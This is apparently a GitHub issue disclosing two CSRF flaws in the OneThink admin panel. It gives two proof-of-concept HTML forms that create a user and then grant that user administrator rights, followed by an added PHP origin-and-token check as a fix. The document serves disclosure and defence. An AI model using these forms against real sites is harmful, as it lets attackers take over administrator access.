onethink

There are two CSRF vulnerabilities that can add the administrator account

Open usermuziLi opened this issue 7 years ago • 0 comments

After the administrator has logged in, open the following two pages.

PoC:

one.html---add a user

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.88/onethink-master/wwwroot/admin.php?s=/User/add.html" method="POST">
      <input type="hidden" name="username" value="r1" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="repassword" value="123456" />
      <input type="hidden" name="email" value="64345647&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

two.html---Endowing user administrator privileges

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.88/onethink-master/wwwroot/admin.php?s=/AuthManager/addToGroup.html" method="POST">
      <input type="hidden" name="group&#95;id&#91;&#93;" value="1" />
      <input type="hidden" name="uid" value="2" />
      <input type="hidden" name="batch" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

usermuziLi, Aug 06 '18 13:08
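
A cross-site form like the two above is accepted when a state-changing endpoint relies only on the administrator's session cookie. The following is an added example, not code from this issue or from the OneThink code base, of a server-side guard that checks the request's Origin/Referer and a per-session token before a POST is processed. The names `csrf_token()`, `csrf_check()`, the `_csrf` form field and the `TRUSTED_ORIGIN` value are hypothetical.

```php
<?php
// Added example, not OneThink code. Hypothetical names: csrf_token(),
// csrf_check(), the "_csrf" form field; TRUSTED_ORIGIN is a placeholder.
const TRUSTED_ORIGIN = 'https://admin.example.test';

// Return the per-session token, creating it on first use (PHP >= 7.0).
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// True if the request may change state. Pass $_SERVER, $_POST, $_SESSION.
function csrf_check(array $server, array $post, array $session): bool
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods; handlers must not change state on these
    }
    // 1. If the browser sent Origin (or Referer), it must be the admin site.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '') {
        $p = parse_url($source);
        if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
            return false; // covers "Origin: null" and malformed values
        }
        $origin = $p['scheme'] . '://' . $p['host']
                . (isset($p['port']) ? ':' . $p['port'] : '');
        if (strcasecmp($origin, TRUSTED_ORIGIN) !== 0) {
            return false;
        }
    }
    // 2. The body must carry the session's token; compare in constant time.
    $sent = $post['_csrf'] ?? '';
    $want = $session['csrf'] ?? '';
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

// Constructed requests: a cross-site POST shaped like one.html (no token,
// foreign Origin), then a same-site POST carrying the session's token.
$session = [];
$token   = csrf_token($session);
$fields  = ['username' => 'r1', 'password' => '123456', 'repassword' => '123456'];
$foreign = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other-site.example'];
$same    = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => TRUSTED_ORIGIN];
var_dump(csrf_check($foreign, $fields, $session));
var_dump(csrf_check($same, $fields + ['_csrf' => $token], $session));
```

In a real application the token from `csrf_token($_SESSION)` is rendered as a hidden field in every admin form, and `csrf_check($_SERVER, $_POST, $_SESSION)` runs before any controller action that creates users or changes group membership.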